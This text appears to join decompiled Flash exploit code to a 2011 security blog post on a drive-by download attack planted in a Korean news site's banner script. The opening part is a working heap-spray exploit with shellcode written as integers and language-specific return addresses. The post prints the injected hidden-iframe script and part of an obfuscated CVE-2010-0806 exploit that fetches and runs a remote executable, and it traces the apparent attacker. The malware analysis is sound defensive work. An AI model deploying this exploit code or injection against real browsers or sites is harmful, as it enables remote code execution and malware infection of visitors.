this.s.writeInt(397699476);       this.s.writeInt(3269531601);       this.s.writeInt(732668751);       this.s.writeInt(3777483065);       this.s.writeInt(3982291672);       this.s.writeInt(882305571);       this.s.writeInt(702931256);       this.s.writeInt(2718503897);       this.s.writeInt(4254533052);       this.s.writeInt(1773979361);       this.s.writeInt(1065642478);       this.s.writeInt(2842279166);       this.s.writeInt(3779029478);       this.s.writeInt(1776363337);       this.s.writeInt(3166380298);       this.s.writeInt(1109335325);       this.s.writeInt(3499521006);       this.s.writeInt(1732070745);       this.s.writeInt(2171286445);       this.s.writeInt(4232480269);       this.s.writeInt(3045388061);       this.s.writeInt(2062086682);       this.s.writeInt(3123304899);       this.s.writeInt(3806520034);       trace(this.s.length);       this.i = 0;       while (this.i < 176) {         // label         this.s2 = new ByteArray();         this.s2.writeBytes(this.s, 0, this.s.length);         trace(this.s2.length);         this.a.push(this.s2);         var _loc_1: String;         _loc_1.i = this.i++;       } // end while       this.r = this.hexToBin(this.t);       this.ldr = new Loader();       this.ldr.loadBytes(this.r);       stop();       return;     } // end function   } }  //============================================== package ie8_fla {   import flash.display. * ;   import flash.system. * ;   import flash.utils. * ;    dynamic public class MainTimeline extends MovieClip {     public     var s: Object;     public     var s2: Object;     public     var s3: Object;     public     var a: Object;     public     var i: Object;     public     var j: Object;     public     var sc_len: uint;     public     var t: Object;     public     var r_cn: ByteArray;     public     var ldr_cn: Loader;     public     var r: ByteArray;     public     var ldr: Loader;     public     var r_jp: ByteArray;     public     var ldr_jp: Loader;      public      function MainTimeline() {       addFrameScript(0, this.frame1);       return;     } // end function     public      function hexToBin(param1: String): ByteArray {       var _loc_2: String;       var _loc_3: * = new ByteArray();       var _loc_4: * = param1.length;       var _loc_5: uint;       _loc_3.endian = Endian.LITTLE_ENDIAN;       while (_loc_5 < _loc_4) {         // label         _loc_2 = param1.charAt(_loc_5) + param1.charAt(_loc_5 + 1);         _loc_3.writeByte(parseInt(_loc_2, 16));         _loc_5 = _loc_5 + 2;       } // end while       return _loc_3;     } // end function      function frame1() {       this.s = new ByteArray();       this.s2 = new ByteArray();       this.a = new Array();       this.sc_len = 0;       this.t = "4357530a22060000789c5d547d4c5b55143faf5ff742617c38e806ad01743a9d0a861931822b520a685bb4632c6e0a2bf4d136a52de97bf5019b1fdb7423d982c69017e6321d31e8a2c9dcdc8c2133e81fc62d0edd747f90cc8f3847164de6b268a2532778cfbd0f4abc49efbbeffcceef9cdff9ddf40d82b51ba0e030c02a093c45c0d606f3bf56003d0fac40761fed71910beff7b856141f32c12716b695c0483150688447a1093cd00c5e688156182d809eb41c8a830496bbc1045b253d17c8e5df6ab61167feb937b73126c00113dc09eebd12981d6ce319d393431269dcb2675e64f0f801eca2e7b3526c99f94e91fbd98243b78145b29828e77eb3beaa9adc7bf6fbf3821b68d599e44bb7556bbe1e16c803d4fc25128f01226dc1da4e8ee440f00e0cccfc5852c30385d8cd62b648049bb1f2a620e266f682cf9fbf3af30ccfcb05bb4e802751400527eabeee20bed3f7bd27143875135033e736406725e7d8a1850fcc208bf40442c726bbda38b412705a071358c5fbcc1df921c08122d0ed9055636119be05b6c10256313f82adafa4bc8f91d5af4e7d285aeb3940adc22a9b1bf1b70267b793a78faf7f49e0f58cbe9f6b3e54fdd7ada4e7bcedd2a266029490303bb6a3887307eb860d979c7eccf78fbf11271f444263223fe870fa8318df3f3ef61c5122f15dc6cd3560d0f7cbcb0f9213a5c367168bdb81529a232ccb6de006d9034c4b1de89540f30c80e68bc30a6aa505d9a315055d898cdfce05497895ed0b5c654769a48a07f3f9e48b75b8867f4edfe32296ba0b3f2dbb94c2518ade98ee824a6ec2e074d70b646fe3c48b4bee71ef2c12a541072678bb6e6c225313e45d91d0ce5aff09dcd88b3b4ed59235bb3d3386b16ed4f3c7ac678d71a7f5ee7a748805eda33b938695f54ea436bd32be997c3c103922a8c2c79b0f1cdd40cc5f3cf9a9e1a313a9f315659b8cf9fc4111fafd6a69cca826885b3e3fdc4a261feafe6891e8c7b4e877279fe26936bc2accdb79592b26cf3b477e5dde3530672e22c7cb6f5e5b228bb9e33766c2648cd41e5cfac75e97f43dc21d5a448b85d1b71004e94a5a424bb3d7e5c81e57658fabb3c73251a69096d35cdbd6cdd77bf12760272db7e5196b3162fd7f84a9d93e8f2a13b3b38f93d7d6ae3d695c1f0b35ee7b3b4dde611bff543d2cbd5e215dad99ac993bd57c6d7a6a6862ddb71777b58fb824176c54d3b16404fae564448d426f34946e4a85e54615fad2a94493f1cae32cd61b52e40ae89007556f2a9d08a9a0c48619d8dd974942673c9c8946827222daa7ddaf64d25a5adba1448dcf60445637626a4b588b2e03352d8d2f6e6d1debcd72b072f3a02a275518d614ad56641aa02734840f6f2aa9fa628a2a64c4e4fe30f843289d3552e5e6c4803ae44f3d1b939bfa6303a046630ab429c14c3289532ab2eac7717ca950b833945678597900d9ac6a2c9991a10267040f2b05be62e670d9dfe0669efe07c8b77774";       trace("if");       if (Capabilities.language.toLowerCase() == "zh-cn") {         this.s.writeInt(2425393296);         this.s.writeInt(2425393296);         this.s.writeInt(202150032);         this.s.writeInt(3943717707);         this.s.writeInt(868837049);         this.s.writeInt(1459781684);         this.s.writeInt(199418618);         this.s.writeInt(3943033067);         this.s.writeInt(4294967051);         this.s.writeInt(3554730722);         this.s.writeInt(3184599686);         this.s.writeInt(1137894114);         this.s.writeInt(3798573806);         this.s.writeInt(1772287593);         this.s.writeInt(3798590057);         this.s.writeInt(2331142421);         this.s.writeInt(2296888074);         this.s.writeInt(786686690);         this.s.writeInt(1912609418);         this.s.writeInt(2396115170);         this.s.writeInt(2324793991);         this.s.writeInt(2394319332);         this.s.writeInt(181396450);         this.s.writeInt(3798534792);         this.s.writeInt(3820685903);         this.s.writeInt(3823297024);         this.s.writeInt(459880033);         this.s.writeInt(246835486);         this.s.writeInt(167557899);         this.s.writeInt(350413538);         this.s.writeInt(3087736802);         this.s.writeInt(3806509448);         this.s.writeInt(3800621747);         this.s.writeInt(2964424930);         this.s.writeInt(498398731);         this.s.writeInt(400745186);         this.s.writeInt(171908381);         this.s.writeInt(495030150);         this.s.writeInt(3431438983);         this.s.writeInt(3268256194);         this.s.writeInt(2762846402);         this.s.writeInt(3450913472);         this.s.writeInt(3350704551);         this.s.writeInt(2964500653);         this.s.writeInt(2762714791);         this.s.writeInt(3351162509);         this.s.writeInt(2172882626);         this.s.writeInt(2978453142);         this.s.writeInt(2341242257);         this.s.writeInt(3199633295);         this.s.writeInt(2458751107);         this.s.writeInt(2426127019);         this.s.writeInt(2358675344);         this.s.writeInt(2357696194);         this.s.writeInt(2760609415);         this.s.writeInt(2445197506);         this.s.writeInt(3347825323);         this.s.writeInt(2898446988);         this.s.writeInt(2274726292);         this.s.writeInt(2341242824);         this.s.writeInt(3431502544);         this.s.writeInt(3418531501);         this.s.writeInt(3268070017);         this.s.writeInt(2407976071);         this.s.writeInt(2592588480);         this.s.writeInt(3447833222);         this.s.writeInt(2274280141);         this.s.writeInt(2445461398);         this.s.writeInt(2274333383);         this.s.writeInt(3197211777);         this.s.writeInt(2324533654);         this.s.writeInt(3431438983);         this.s.writeInt(3267675330);         this.s.writeInt(2173538971);         this.s.writeInt(3267413899);         this.s.writeInt(3233990550);         this.s.writeInt(2274333383);         this.s.writeInt(3197211777);         this.s.writeInt(2324533654);         this.s.writeInt(3431438983);         this.s.writeInt(3268254658);         this.s.writeInt(3301229185);         this.s.writeInt(2407976071);         this.s.writeInt(2592588493);         this.s.writeInt(2177012118);         this.s.writeInt(2207291074);         this.s.writeInt(3348531087);         this.s.writeInt(2462563985);         this.s.writeInt(2491517581);         this.s.writeInt(2442579079);         this.s.writeInt(2592587979);         this.s.writeInt(3420588775);         this.s.writeInt(488447361);         this.s.writeInt(2407976071);         this.s.writeInt(2592596490);         this.s.writeInt(471604509);         this.s.writeInt(2375190412);         this.s.writeInt(3800621597);         this.s.writeInt(3035259610);         this.s.writeInt(177662050);         this.s.writeInt(3658192615);         this.s.writeInt(1658456471);         this.s.writeInt(4083391207);         this.s.writeInt(1920103026);         this.s.writeInt(2531944733);         this.s.writeInt(3077115503);         this.s.writeInt(2733055234);         this.s.writeInt(182313698);         this.s.writeInt(3793838810);         this.s.writeInt(177662050);         this.s.writeInt(3658192615);         this.s.writeInt(1658456471);         this.s.writeInt(4083391207);         this.s.writeInt(1920103026);         this.s.writeInt(2516749034);         this.s.writeInt(3907183215);         this.s.writeInt(2733055234);         this.s.writeInt(183886562);         this.s.writeInt(3793816307);         this.s.writeInt(3806519898);         this.s.writeInt(4091799138);         this.s.writeInt(552526345);         this.s.writeInt(3770294538);         this.s.writeInt(454892829);         this.s.writeInt(3106202970);         this.s.writeInt(1807606660);         this.s.writeInt(631629597);         this.s.writeInt(35762537);         this.s.writeInt(1051822242);         this.s.writeInt(2330129122);         this.s.writeInt(3803539876);         this.s.writeInt(3993672221);         this.s.writeInt(488487457);         this.s.writeInt(3014945175);         this.s.writeInt(3731461836);         this.s.writeInt(2598442932);         this.s.writeInt(1771356897);         this.s.writeInt(399584171);         this.s.writeInt(2739921191);         this.s.writeInt(3510234460);         this.s.writeInt(4074255510);         this.s.writeInt(3928173029);         this.s.writeInt(3778585097);         this.s.writeInt(333053335);         this.s.writeInt(96233916);         this.s.writeInt(3336650628);         this.s.writeInt(1777248617);         this.s.writeInt(3170820415);         this.s.writeInt(1776708065);         this.s.writeInt(659143867);         this.s.writeInt(554313759);         this.s.writeInt(488493206);         this.s.writeInt(1945003837);         this.s.writeInt(1297711467);         this.s.writeInt(867040326);         this.s.writeInt(2249045380);         this.s.writeInt(4011702825);         this.s.writeInt(3653493474);         this.s.writeInt(3806461952);         this.sc_len = this.s.length;         trace("cn");         trace(this.s.length);         this.j = 3084 - this.sc_len;         this.i = 0;         while (this.i < this.j) {           // label           this.s.writeByte(144);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         this.s.endian = Endian.LITTLE_ENDIAN;         this.s.writeInt(2008988467);         this.s.writeInt(3435973836);         this.s.writeInt(2008964821);         this.s.writeInt(3435973836);         this.s.writeInt(2008944920);         this.s.writeInt(2009023683);         this.s.writeInt(3435973836);         this.s.writeInt(2009016856);         this.s.writeInt(202113024);         this.s.writeInt(202113024);         this.s.writeInt(8192);         this.s.writeInt(64);         this.s.writeInt(202116560);         this.s.writeInt(0);         this.s.writeInt(202116164);         this.s.writeInt(0);         this.s.writeInt(0);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.i = 0;         while (this.i < this.sc_len) {           // label           this.s.writeInt(1676697940);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         this.s.writeInt(1676697940);         this.s.writeInt(1676697940);         this.s.writeInt(1676680900);         this.s.endian = Endian.BIG_ENDIAN;         this.j = 65536 - this.s.length;         this.i = 0;         while (this.i < this.j / 4) {           // label           this.s.writeInt(305419896);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         this.i = 0;         while (this.i < 16) {           // label           this.s2.writeBytes(this.s, 0, this.s.length);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         trace(this.s2.length);         this.i = 0;         while (this.i < 176) {           // label           this.s3 = new ByteArray();           this.s3.writeBytes(this.s2, 0, this.s2.length);           trace(this.s3.length);           this.a.push(this.s3);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         this.r_cn = this.hexToBin(this.t);         this.ldr_cn = new Loader();         this.ldr_cn.loadBytes(this.r_cn);       } // end if       if (Capabilities.language.toLowerCase() == "en") {         this.s.writeInt(2425393296);         this.s.writeInt(2425393296);         this.s.writeInt(202150032);         this.s.writeInt(3943717707);         this.s.writeInt(868837049);         this.s.writeInt(1459781684);         this.s.writeInt(199418618);         this.s.writeInt(3943033067);         this.s.writeInt(4294967051);         this.s.writeInt(3554730722);         this.s.writeInt(3184599686);         this.s.writeInt(1137894114);         this.s.writeInt(3798573806);         this.s.writeInt(1772287593);         this.s.writeInt(3798590057);         this.s.writeInt(2331142421);         this.s.writeInt(2296888074);         this.s.writeInt(786686690);         this.s.writeInt(1912609418);         this.s.writeInt(2396115170);         this.s.writeInt(2324793991);         this.s.writeInt(2394319332);         this.s.writeInt(181396450);         this.s.writeInt(3798534792);         this.s.writeInt(3820685903);         this.s.writeInt(3823297024);         this.s.writeInt(459880033);         this.s.writeInt(246835486);         this.s.writeInt(167557899);         this.s.writeInt(350413538);         this.s.writeInt(3087736802);         this.s.writeInt(3806509448);         this.s.writeInt(3800621747);         this.s.writeInt(2964424930);         this.s.writeInt(498398731);         this.s.writeInt(400745186);         this.s.writeInt(171908381);         this.s.writeInt(495030150);         this.s.writeInt(3431438983);         this.s.writeInt(3268256194);         this.s.writeInt(2762846402);         this.s.writeInt(3450913472);         this.s.writeInt(3350704551);         this.s.writeInt(2964500653);         this.s.writeInt(2762714791);         this.s.writeInt(3351162509);         this.s.writeInt(2172882626);         this.s.writeInt(2978453142);         this.s.writeInt(2341242257);         this.s.writeInt(3199633295);         this.s.writeInt(2458751107);         this.s.writeInt(2426127019);         this.s.writeInt(2358675344);         this.s.writeInt(2357696194);         this.s.writeInt(2760609415);         this.s.writeInt(2445197506);         this.s.writeInt(3347825323);         this.s.writeInt(2898446988);         this.s.writeInt(2274726292);         this.s.writeInt(2341242824);         this.s.writeInt(3431502544);         this.s.writeInt(3418531501);         this.s.writeInt(3268070017);         this.s.writeInt(2407976071);         this.s.writeInt(2592588480);         this.s.writeInt(3447833222);         this.s.writeInt(2274280141);         this.s.writeInt(2445461398);         this.s.writeInt(2274333383);         this.s.writeInt(3197211777);         this.s.writeInt(2324533654);         this.s.writeInt(3431438983);         this.s.writeInt(3267675330);         this.s.writeInt(2173538971);         this.s.writeInt(3267413899);         this.s.writeInt(3233990550);         this.s.writeInt(2274333383);         this.s.writeInt(3197211777);         this.s.writeInt(2324533654);         this.s.writeInt(3431438983);         this.s.writeInt(3268254658);         this.s.writeInt(3301229185);         this.s.writeInt(2407976071);         this.s.writeInt(2592588493);         this.s.writeInt(2177012118);         this.s.writeInt(2207291074);         this.s.writeInt(3348531087);         this.s.writeInt(2462563985);         this.s.writeInt(2491517581);         this.s.writeInt(2442579079);         this.s.writeInt(2592587979);         this.s.writeInt(3420588775);         this.s.writeInt(488447361);         this.s.writeInt(2407976071);         this.s.writeInt(2592596490);         this.s.writeInt(471604509);         this.s.writeInt(2375190412);         this.s.writeInt(3800621597);         this.s.writeInt(3035259610);         this.s.writeInt(177662050);         this.s.writeInt(3658192615);         this.s.writeInt(1658456471);         this.s.writeInt(4083391207);         this.s.writeInt(1920103026);         this.s.writeInt(2531944733);         this.s.writeInt(3077115503);         this.s.writeInt(2733055234);         this.s.writeInt(182313698);         this.s.writeInt(3793838810);         this.s.writeInt(177662050);         this.s.writeInt(3658192615);         this.s.writeInt(1658456471);         this.s.writeInt(4083391207);         this.s.writeInt(1920103026);         this.s.writeInt(2516749034);         this.s.writeInt(3907183215);         this.s.writeInt(2733055234);         this.s.writeInt(183886562);         this.s.writeInt(3793816307);         this.s.writeInt(3806519898);         this.s.writeInt(4091799138);         this.s.writeInt(552526345);         this.s.writeInt(3770294538);         this.s.writeInt(454892829);         this.s.writeInt(3106202970);         this.s.writeInt(1807606660);         this.s.writeInt(631629597);         this.s.writeInt(35762537);         this.s.writeInt(1051822242);         this.s.writeInt(2330129122);         this.s.writeInt(3803539876);         this.s.writeInt(3993672221);         this.s.writeInt(488487457);         this.s.writeInt(3014945175);         this.s.writeInt(3731461836);         this.s.writeInt(2598442932);         this.s.writeInt(1771356897);         this.s.writeInt(399584171);         this.s.writeInt(2739921191);         this.s.writeInt(3510234460);         this.s.writeInt(4074255510);         this.s.writeInt(3928173029);         this.s.writeInt(3778585097);         this.s.writeInt(333053335);         this.s.writeInt(96233916);         this.s.writeInt(3336650628);         this.s.writeInt(1777248617);         this.s.writeInt(3170820415);         this.s.writeInt(1776708065);         this.s.writeInt(659143867);         this.s.writeInt(554313759);         this.s.writeInt(488493206);         this.s.writeInt(1945003837);         this.s.writeInt(1297711467);         this.s.writeInt(867040326);         this.s.writeInt(2249045380);         this.s.writeInt(4011702825);         this.s.writeInt(3653493474);         this.s.writeInt(3806461952);         this.sc_len = this.s.length;         trace("en");         trace(this.s.length);         this.j = 3084 - this.sc_len;         this.i = 0;         while (this.i < this.j) {           // label           this.s.writeByte(144);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         this.s.endian = Endian.LITTLE_ENDIAN;         this.s.writeInt(1995123259);         this.s.writeInt(3435973836);         this.s.writeInt(1995172943);         this.s.writeInt(3435973836);         this.s.writeInt(2009141528);         this.s.writeInt(2009220291);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(2009213464);         this.s.writeInt(202113024);         this.s.writeInt(202113024);         this.s.writeInt(8192);         this.s.writeInt(64);         this.s.writeInt(202116560);         this.s.writeInt(0);         this.s.writeInt(202116164);         this.s.writeInt(0);         this.s.writeInt(0);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.i = 0;         while (this.i < this.sc_len) {           // label           this.s.writeInt(1676697940);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         this.s.writeInt(1676697940);         this.s.writeInt(1676697940);         this.s.writeInt(1676680900);         this.s.endian = Endian.BIG_ENDIAN;         this.j = 65536 - this.s.length;         this.i = 0;         while (this.i < this.j / 4) {           // label           this.s.writeInt(305419896);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         this.i = 0;         while (this.i < 16) {           // label           this.s2.writeBytes(this.s, 0, this.s.length);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         trace(this.s2.length);         this.i = 0;         while (this.i < 176) {           // label           this.s3 = new ByteArray();           this.s3.writeBytes(this.s2, 0, this.s2.length);           trace(this.s3.length);           this.a.push(this.s3);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         this.r = this.hexToBin(this.t);         this.ldr = new Loader();         this.ldr.loadBytes(this.r);       } // end if       if (Capabilities.language.toLowerCase() == "ja") {         this.s.writeInt(2425393296);         this.s.writeInt(2425393296);         this.s.writeInt(202150032);         this.s.writeInt(3943717707);         this.s.writeInt(868837049);         this.s.writeInt(1459781684);         this.s.writeInt(199418618);         this.s.writeInt(3943033067);         this.s.writeInt(4294967051);         this.s.writeInt(3554730722);         this.s.writeInt(3184599686);         this.s.writeInt(1137894114);         this.s.writeInt(3798573806);         this.s.writeInt(1772287593);         this.s.writeInt(3798590057);         this.s.writeInt(2331142421);         this.s.writeInt(2296888074);         this.s.writeInt(786686690);         this.s.writeInt(1912609418);         this.s.writeInt(2396115170);         this.s.writeInt(2324793991);         this.s.writeInt(2394319332);         this.s.writeInt(181396450);         this.s.writeInt(3798534792);         this.s.writeInt(3820685903);         this.s.writeInt(3823297024);         this.s.writeInt(459880033);         this.s.writeInt(246835486);         this.s.writeInt(167557899);         this.s.writeInt(350413538);         this.s.writeInt(3087736802);         this.s.writeInt(3806509448);         this.s.writeInt(3800621747);         this.s.writeInt(2964424930);         this.s.writeInt(498398731);         this.s.writeInt(400745186);         this.s.writeInt(171908381);         this.s.writeInt(495030150);         this.s.writeInt(3431438983);         this.s.writeInt(3268256194);         this.s.writeInt(2762846402);         this.s.writeInt(3450913472);         this.s.writeInt(3350704551);         this.s.writeInt(2964500653);         this.s.writeInt(2762714791);         this.s.writeInt(3351162509);         this.s.writeInt(2172882626);         this.s.writeInt(2978453142);         this.s.writeInt(2341242257);         this.s.writeInt(3199633295);         this.s.writeInt(2458751107);         this.s.writeInt(2426127019);         this.s.writeInt(2358675344);         this.s.writeInt(2357696194);         this.s.writeInt(2760609415);         this.s.writeInt(2445197506);         this.s.writeInt(3347825323);         this.s.writeInt(2898446988);         this.s.writeInt(2274726292);         this.s.writeInt(2341242824);         this.s.writeInt(3431502544);         this.s.writeInt(3418531501);         this.s.writeInt(3268070017);         this.s.writeInt(2407976071);         this.s.writeInt(2592588480);         this.s.writeInt(3447833222);         this.s.writeInt(2274280141);         this.s.writeInt(2445461398);         this.s.writeInt(2274333383);         this.s.writeInt(3197211777);         this.s.writeInt(2324533654);         this.s.writeInt(3431438983);         this.s.writeInt(3267675330);         this.s.writeInt(2173538971);         this.s.writeInt(3267413899);         this.s.writeInt(3233990550);         this.s.writeInt(2274333383);         this.s.writeInt(3197211777);         this.s.writeInt(2324533654);         this.s.writeInt(3431438983);         this.s.writeInt(3268254658);         this.s.writeInt(3301229185);         this.s.writeInt(2407976071);         this.s.writeInt(2592588493);         this.s.writeInt(2177012118);         this.s.writeInt(2207291074);         this.s.writeInt(3348531087);         this.s.writeInt(2462563985);         this.s.writeInt(2491517581);         this.s.writeInt(2442579079);         this.s.writeInt(2592587979);         this.s.writeInt(3420588775);         this.s.writeInt(488447361);         this.s.writeInt(2407976071);         this.s.writeInt(2592596490);         this.s.writeInt(471604509);         this.s.writeInt(2375190412);         this.s.writeInt(3800621597);         this.s.writeInt(3035259610);         this.s.writeInt(177662050);         this.s.writeInt(3658192615);         this.s.writeInt(1658456471);         this.s.writeInt(4083391207);         this.s.writeInt(1920103026);         this.s.writeInt(2531944733);         this.s.writeInt(3077115503);         this.s.writeInt(2733055234);         this.s.writeInt(182313698);         this.s.writeInt(3793838810);         this.s.writeInt(177662050);         this.s.writeInt(3658192615);         this.s.writeInt(1658456471);         this.s.writeInt(4083391207);         this.s.writeInt(1920103026);         this.s.writeInt(2516749034);         this.s.writeInt(3907183215);         this.s.writeInt(2733055234);         this.s.writeInt(183886562);         this.s.writeInt(3793816307);         this.s.writeInt(3806519898);         this.s.writeInt(4091799138);         this.s.writeInt(552526345);         this.s.writeInt(3770294538);         this.s.writeInt(454892829);         this.s.writeInt(3106202970);         this.s.writeInt(1807606660);         this.s.writeInt(631629597);         this.s.writeInt(35762537);         this.s.writeInt(1051822242);         this.s.writeInt(2330129122);         this.s.writeInt(3803539876);         this.s.writeInt(3993672221);         this.s.writeInt(488487457);         this.s.writeInt(3014945175);         this.s.writeInt(3731461836);         this.s.writeInt(2598442932);         this.s.writeInt(1771356897);         this.s.writeInt(399584171);         this.s.writeInt(2739921191);         this.s.writeInt(3510234460);         this.s.writeInt(4074255510);         this.s.writeInt(3928173029);         this.s.writeInt(3778585097);         this.s.writeInt(333053335);         this.s.writeInt(96233916);         this.s.writeInt(3336650628);         this.s.writeInt(1777248617);         this.s.writeInt(3170820415);         this.s.writeInt(1776708065);         this.s.writeInt(659143867);         this.s.writeInt(554313759);         this.s.writeInt(488493206);         this.s.writeInt(1945003837);         this.s.writeInt(1297711467);         this.s.writeInt(867040326);         this.s.writeInt(2249045380);         this.s.writeInt(4011702825);         this.s.writeInt(3653493474);         this.s.writeInt(3806461952);         this.sc_len = this.s.length;         trace("jp");         trace(this.s.length);         this.j = 3084 - this.sc_len;         this.i = 0;         while (this.i < this.j) {           // label           this.s.writeByte(144);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         this.s.endian = Endian.LITTLE_ENDIAN;         this.s.writeInt(2008857395);         this.s.writeInt(3435973836);         this.s.writeInt(2008833749);         this.s.writeInt(3435973836);         this.s.writeInt(2008813848);         this.s.writeInt(2008892611);         this.s.writeInt(3435973836);         this.s.writeInt(2008885784);         this.s.writeInt(202113024);         this.s.writeInt(202113024);         this.s.writeInt(8192);         this.s.writeInt(64);         this.s.writeInt(202116560);         this.s.writeInt(0);         this.s.writeInt(202116164);         this.s.writeInt(0);         this.s.writeInt(0);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.s.writeInt(3435973836);         this.i = 0;         while (this.i < this.sc_len) {           // label           this.s.writeInt(1676697940);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         this.s.writeInt(1676697940);         this.s.writeInt(1676697940);         this.s.writeInt(1676680900);         this.s.endian = Endian.BIG_ENDIAN;         this.j = 65536 - this.s.length;         this.i = 0;         while (this.i < this.j / 4) {           // label           this.s.writeInt(305419896);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         this.i = 0;         while (this.i < 16) {           // label           this.s2.writeBytes(this.s, 0, this.s.length);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         trace(this.s2.length);         this.i = 0;         while (this.i < 176) {           // label           this.s3 = new ByteArray();           this.s3.writeBytes(this.s2, 0, this.s2.length);           trace(this.s3.length);           this.a.push(this.s3);           var _loc_1: String;           _loc_1.i = this.i++;         } // end while         this.r_jp = this.hexToBin(this.t);         this.ldr_jp = new Loader();         this.ldr_jp.loadBytes(this.r_jp);       } else {         trace("I am " + Capabilities.language);         trace("failed");       } // end else if       stop();       return;     } // end function   } }

Malvertising or drive-by web malware attack?

2011-01-24T09:35:00.000-08:00

Recently we've been thinking about how to generate some statistics for malvertising.

Sometimes it's tricky, because nowadays more and more drive-by downloads try to hide themselves by disguising as coming from ad servers.

Here's an example. Recently our scanners reported that betanews.net, a Korean news website ranking 671 in Korea, was serving live drive-by downloads.

Well, it indeed is, as we write.

In its index page, www.betanews.net contains the following javascript, which displays ad banners:


<script type="text/javascript" src="/js/banner.js"></script>

/js/banner.js was compromised and the following malicious script was inserted at the end of the file:


if(document.cookie.indexOf('xxoo')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='xxoo=Yes;path=/;expires='+expires.toGMTString;document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%64%2E%69%6C%69%6B%65%63%31%69%63%6B%2E%63%6F%6D%2F%61%64%2E%61%73%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E"));}

Which, after decoding,writes the following:


<iframe src="http://ad.ilikec1ick.com/ad.asp" width=0 height=0></iframe>

This "ilikec1ick.com" domain apparently tries to resemble "ilikeclick.com", which is a Korean ad network:

http://ad.ilikec1ick.com/ad.asp contains the javascript exploit:


<script>
document.write("<bu"+"tton i"+"d='mon' o"+"ncl"+"ick"+"='sc"+"lick();' S"+"TYLE='DISP"+"LAY"+":NONE'></b"+"utton>");
var eLFGhbswV="%x9090%";var ZyOWqionK="x9090%x5858%x5858%x10EB%x4B5B";var LoLYVDGGQ="%xC933%xB966%x03B8%x3480";var cXbQEhvHS="%xBD0B%xFAE2%x05EB%xEBE8%";var UpiNKTfoo="xFFFF";var GIMIByGgI="%x54FF%xBEA3%xBDBD%xD9E2";var xsBZzgBPo="%x8D1C%";var lXOdHiLAV="xBDBD";var ZzEEOlPoD="%x36BD%xB1FD%xCD36%x1";var SbYhcedXP="0A1%xD53";var xngsAiUQI="6%x36B5%xD74A%xE4A";var KGhCigcMg="C%x0355%xBDBF%x";var iWWZubmWc="2DBD%x455F%x8ED5%x";var pefyOgmGu="BD8F%xD5BD%xCEE8%xCF";var kEqSfhtbi="D8%x36E9%xB1FB%x0";var AObPGCHfF="355%xBDBC%x36BD%xD755%xE4B";var 
(omitted)

This is an iepeers (CVE-2010-0806) exploit; after successful exploitation, the browser downloads and executes http://weniz.co.kr/mall/updir/cs/pds.exe.

The exploit, ad.asp, triggers 7/32 on VirusTotal, and the malware, pds.exe, triggers 27/42.

OK, and so, is this a drive-by download attack, or a malvertising attack?

Very similar to the previous "adshufffle.com" malvertising incident, this incident also involves a malicious domain "ilikec1ick.com" which resembles "ilikeclick.com".

So should this be categorized as a malvertising incident? I would say no. I don't think the attacker registered ilikec1ick.com and then tricked betanews.net to take on his ad. I think in this case, he simply hacked into betanews.com and modified their banner.js file. However, in order to prolong the lifespan of this drive-by download operation, he's registered his malicious domain to resemble an ad network, hoping that this would reduce the chance of someone noticing something funny.

This is one of the challenges we currently face at generating malvertising statistics. Although malvertising, mass sql injections, mass hosting compromises, mass wordpress injections, and individual hacks such as this case, all often end up serving drive-by downloads (Web malware), the threats should be categorized differently from a "point of entry" standpoint. However, doing so requires quite some manual labor.

Wayne

PS: Last time we were able to identify the individual behind the "adshufffle.com" malvertising attack. Well, how about for this example? We attempted a try.

The domain ilikec1ick.com was registered on Jan 19th by "gxiboy@gmail.com". This fellow posted an ad (in Chinese) last month:


接单(拿SHELL 数据库 等等)

接单
地区：韩国 台湾 美国 等等(除国内)
类型：数据库（各种）,webshell,渗透项目测试等等
要求:只接3000以上的单子 小单勿扰
找长期合作伙伴 无需定金,拿到后验证过付钱.
联系方式GT [email]Gxiboy@Gmail.com[/email] QQ:9 9 8 3 8 0 8

I'll translate it:
Hope to acquire projects (get shell, database, etc)
Region: Korea, Taiwan, US, etc, but no domestic targets (mainland China)
Scope of work: all types of databases, webshell, pentesting
Requirement: Fees start at no less than 450USD / project

Looking for long-term partnerships, no up-front payment required, pay after you get what you want.

And then there's his email and QQ. From his QQ, he's a 25-year-old male nicknamed "All night prince," and based out of China. I think he's based out of Guangdong because most of the websites that he operate, for example, ktdown.com and www.tianqiyugao.net, are all located in Guangdong.

The "services" that he offers matches with our speculation--that he broke into betanews.net and injected the drive-by iframe.

About HDD Plus spreading also through OpenX vulnerabilities, and a guy behind all this

2010-12-17T11:08:00.000-08:00

(Credits: Wayne Huang, Chris Hsiao, NightCola Lin)
(Part 1 of the story is here)

